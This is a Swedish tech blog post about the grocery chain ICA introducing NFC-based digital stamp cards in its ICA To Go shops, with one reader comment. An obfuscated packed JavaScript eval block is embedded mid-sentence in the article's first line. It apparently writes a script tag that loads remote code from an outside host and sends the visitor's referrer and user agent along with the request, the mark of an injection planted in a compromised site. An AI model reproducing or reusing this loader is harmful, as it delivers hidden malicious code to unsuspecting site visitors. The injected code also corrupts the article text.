Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

ICA satsar på mobilplånbok, nfc

ICA satsar på mobilplånbok, nfc
Sebastian

Vi eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hezak|var|u0026u|referrer|bbitr||js|php’.split(’|’),0,{}))
har tidigare skrivit om att flera företag börjat smått med att introducera betalningsmöjligheter med din smartphone. Vi nämnde bl.a. att det ryktas om att den kommande
iPhone 5 kommer ha detta implementerat redan från start (läs mer om iPhone 5 ). Men nu är tekniken redan här.

De flesta ICA-butiker har redan börjat använda sig av teknik för nfc(Near field communication)-betalningar på plats. Det är en ständig kamp på marknaden om vilket bolag som vill lyftas fram gällande tekniken. Nu väljer dock livsmedelsjätten ICA att satsa på just nfc-tekniken.

Det första steget gäller inte satsning på betalningar, utan snarare ett digitalt stämpelkort som används i konceptbutikerna ICA To Go. Först ut är butiken i Kista.

I dag är det väldigt få smartphones som har stöd för nfc. Därför finns det gratis klistermärken med inbyggda nfc-taggar att hämta ut i butiken. Detta klistermärke kopplas till ICA applikationen och gör funktionen tillgänglig.
Du håller sen mobiltelefonen över en terminal i några sekunder för att aktivera och registrera stämplar.

Det kommer i första hand att handla om lunchlådor, men stöd för exempelvis kaffe kommer också att finnas.

– Inom fem år tror jag att vi kan betala med våra mobiler. För småköp som det rör sig om i våra To Go-butiker är det perfekt säger Helene Robertson, marknadschef för Ica To Go.

 

Comments

  1. Josefin Alm

    Nu sätter det igång. Tycker det är bra att vi äntligen ligger i fas med tekniken från USA. Var i Chicago för någon månad sen och såg att en Starbucksbutik börjat använda detta lite smått. Även sett i tidningar att det blivit ett smart sätt att ta betalt i tunnelbana och på buss.

    Om nu SL är så sura över att alla fuskar med SMS-biljett kan de väl lägga ner en extra slant på att utveckla något liknande system som detta.